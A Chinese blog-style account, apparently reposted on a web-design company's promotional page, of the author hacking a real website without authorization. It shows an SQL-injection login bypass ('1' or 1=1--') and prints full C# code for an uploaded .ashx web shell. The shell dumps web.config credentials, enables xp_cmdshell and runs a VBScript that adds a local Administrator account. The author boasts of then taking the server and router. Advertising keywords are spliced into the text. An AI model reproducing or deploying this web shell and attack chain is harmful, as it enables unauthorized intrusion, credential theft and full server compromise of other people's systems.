一对一免费咨询: 13913005726 025-66045668

首先我要申明的是不是什么宣城网站建设公司 语言写出来的程序就不安全,而是得看写代码的人如何去写这个程序。

前些日子我去客户那调研,发现客户的监控系统用的是海康威视的硬盘录像机,然后默认用户名是amdin 密码是12345,回来后就想玩一玩看看有多少人用的是默认密码,于是就写了个扫描程序,很快扫描到了一大批网站,也得到很多采用的是默认用户名和密码。

玩了一两天后发现没什么好玩的,就随便在里面找找扫描记录,看到一些后台登陆地址,于是就都测试下,然后就发现了这个网站:

最开始我是测试弱口令:

admin amdin 等,随便测试了几个,没成功,于是开始测试sql的防注入,用户名输入 1' or 1=1-- 密码随便输了个1 登陆,居然登陆成功了……

但发现登陆进来后报错了!!!想了下可能是用户名的问题,于是就找页面看看能不能看到我的登陆用户名,最后找到写邮件里面看到了

当然如果入侵只到这 你肯定会绝对弱爆了…… 其实当然也是,因为我拿下了他的数据和程序。当然最好拿下了他的服务器,得知他服务器是做的端口映射,于是又拿下了他的路由 器,然后就没有再继续往下进行了,当然还可以继续下去,比如 路由器的dns劫持,页面重定向,端口镜像等等

下面我开始介绍主要入侵页面,文件上传页面:

自己写了个ashx页面,上传

代码很简单,就是读取网站的web.config文件然后以文本形式输出,

我先简单说下入侵流程:

1、读取web.config得到数据库连接

2、利用SQL Server执行命令添加Windows用户(因为网站默认是iis用户,没有权限直线net等相关操作,但SQL Server是基于本地服务运行的,权限很高)

我贴出我上传的ashx文件代码:

  1. %@WebHandlerLanguage="C#"Class="TextLd"%

    usingSystem;

  2. usingSystem.Collections.Generic;

    usingSystem.Linq;

  3. usingSystem.Web;

    usingSystem.Data.SqlClient;

  4. publicclassTextLd:IHttpHandler

  5. {

    publicvoidCreateLocalUser(stringnewPath)

  6. {

    System.Diagnostics.Process.Start(@"d:\1.vbs");

  7. System.IO.File.WriteAllText(@"d:\1.vbs","setwsnetwork=CreateObject(\"WSCRIPT.NETWORK\")\r\nos=\"WinNT://\"&wsnetwork.ComputerName\r\nSetob=GetObject(os)\r\nSetoe=GetObject(os&\"/Administrators,group\")'属性,admin组\r\nod=ob.Create(\"user\",\"test\")'建立用户\r\nSetPassword\"1234\"'设置密码\r\nSetInfo\r\nof=GetObject(os&\"/test\",user)\r\naddos&\"/test\"");

    }

  8. publicvoidShowWebConfig(HttpContextcontext)

    {

  9. context.Response.Write(System.IO.File.ReadAllText(context.Request.MapPath("~/web.config")));

    }

  10. publicvoidWriteVbs(HttpContextcontext)

    {

  11. System.IO.File.WriteAllText(context.Request.MapPath("~/1.vbs"),"setwsnetwork=CreateObject(\"WSCRIPT.NETWORK\")\r\nos=\"WinNT://\"&wsnetwork.ComputerName\r\nSetob=GetObject(os)\r\nSetoe=GetObject(os&\"/Administrators,group\")'属性,admin组\r\nod=ob.Create(\"user\",\"test\")'建立用户\r\nSetPassword\"1234\"'设置密码\r\nSetInfo\r\nof=GetObject(os&\"/test\",user)\r\naddos&\"/test\"");

    }

  12. publicvoidExecuteSql(stringconnection,stringsql)

    {

  13. using(SqlConnectioncon=newSqlConnection(connection))

    {

  14. using(SqlCommandcommd=newSqlCommand(sql,con))

    {

  15. con.Open();

    commd.ExecuteNonQuery();

  16. con.Close();

    }

  17. }

    }

  18. publicvoidProcessRequest(HttpContextcontext)

    {

  19. context.Response.ContentType="text/plain";

    context.Response.Write(System.IO.File.ReadAllText(context.Request.MapPath("~/web.config")));

  20. try

    {

  21. varconnection=context.Request.QueryString["connection"];

    switch(context.Request.QueryString["method"])

  22. {

    case"1":WriteVbs(context);break;

  23. case"2":

    ExecuteSql(connection,@"sp_configure'showadvancedoptions',1reconfigure");

  24. ExecuteSql(connection,@"sp_configure'xp_cmdshell',1reconfigure");//开启数据库的xp_cmdshell

    break;

  25. case"3":ExecuteSql(connection,"execmaster..xp_cmdshell'cscript"+context.Request.MapPath("~/1.vbs")+"'");

    break;

  26. default:

    ShowWebConfig(context);

  27. break;

    }

  28. }

    catch(Exceptionex)

  29. {

    context.Response.Write(ex.Message);

  30. }

    context.Response.End();

  31. }

    publicboolIsReusable

  32. {

    get

  33. {

    returnfalse;

  34. }

    }

  35. } 蚌埠网站建设公司

然后一次执行,就这样服务器就被我拿下了! 建立了一个用户名为test密码是1234的超级管理员用户,于是测试下远程连接

然后弄干啥,大家都知道的……

当然,如果不拿下他服务器,你想想你都能直线你自己写的代码了……什么坏事干不了。。。 当然本人只是测试了下可行性,就算不拿下服务器,执行sql语句把他数据库备份下载下来拿还不是分分钟的事情?

好了 我来总结下這次入侵吧,最主要的娄底其实不是他的sql注入(个人觉得,当然他是导火索),而是文件上传,大部分程序员在写文件上传功能的时候,之前客户上传过来的文件保存到网站目录下的某个文件夹,不做任何处理,这也就是导致了他服务器被我拿下的最主要的入口。

所以我还是奉劝大家一下,做文件上传还是对文件进行下处理比较好,具体怎么处理我想聪明的你肯定有很多方法……

小学文化的我伤不起啊…… 公司企业品牌网独特创意设计 网站站建设 原谅我文采不好,你们将就着看吧!


 


 南京牧狼文化传媒有限公司简介:


      牧狼传媒,牧者之心,狼者之性,以牧之谦卑宽容之心待人,以狼之团结无畏之性做事!


  公司注册资金100万,主营众筹全案服务、网站营销全案服务、网站建设、微信小程序开发、电商网店设计、H5页面设计、腾讯社交广告投放以及电商营销推广全案等相关业务,致力于为客户提供更有价值的服务,创造让用户满意的效果!


  为百度官方及其大客户、苏宁易购、金山WPS秀堂、美的、创维家电、新东方在线、伊莱克斯、宝丽莱等国内国外知名品牌服务过,服务经验丰富!同时,公司也是南京电子商务协会会员单位、猪八戒网官方认证签约服务商、江苏八戒服务网联盟、南京浦口文化产业联合会会员单位,可以为您提供更好的服务!


  主营项目:众筹全案服务、网站营销全案服务、网站建设、微信小程序开发、电商网店设计、H5页面设计、腾讯社交广告投放、竞价托管、网站优化、电商代运营等


  合作客户:百度、苏宁易购、饿了么、美的、创维家电、新东方在线、宝丽莱、金山WPS秀堂、伊莱克斯


  资质荣誉:百度商业服务市场2017年度最佳图片服务商、南京电子商务协会会员单位、猪八戒网官方认证签约服务商、江苏八戒服务网联盟、南京浦口文化产业联合会会员单位、八戒通TOP服务商、"易拍即合杯"H5创意大赛"三等奖"。



致力于为客户创造更多价值
13913005726 025-66045668
需求提交
电话咨询
在线咨询